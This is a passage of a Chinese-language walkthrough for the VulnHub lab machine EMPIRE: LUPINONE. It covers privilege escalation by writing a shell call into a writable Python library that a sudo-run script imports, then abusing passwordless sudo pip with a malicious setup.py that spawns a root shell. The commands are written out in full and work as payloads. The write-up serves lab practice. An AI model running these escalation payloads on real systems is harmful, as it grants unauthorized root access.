文章插图
查看该文件的权限,发现该文件具有root权限且当前用户具有编写权限,命令:ls -al /usr/lib/python3.9/webbrowser.py 。
文章插图
因此在该文件中写入shell,代码:os.system("bin/bash") 。
文章插图
然后再用 arsene 调用 /home/arsene/heist.py,获取arsene权限,命令:sudo -u arsene python3.9 /home/arsene/heist.py 。
文章插图
提权:
查看下当前用户可以用 sudo 执行那些命令 。
文章插图
发现了pip命令不需要root密码即可执行,那我们就用pip的root权限安装一个shell的程序,成功获取到 root 权限,查看 flag 。
mkdir upfinecd upfineecho "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > setup.pysudo pip install .
文章插图
文章插图
【vlunhub靶场之EMPIRE: LUPINONE】
经验总结扩展阅读
- 盾之勇者成名录:浪潮绵绵技能效果是什么
- 咖啡之国是哪一个国家
- 中国四大葡萄之乡
- 消除两个inline-block元素之间的间隔
- 诺亚之心风暴试炼51层打法是什么
- 漂唇后几天会掉痂?
- 情侣之间吵架,分分钟拉黑你的三大星座
- vulnhub靶场之EMPIRE
- 甜瓜含糖量
- 瓠子为什么会苦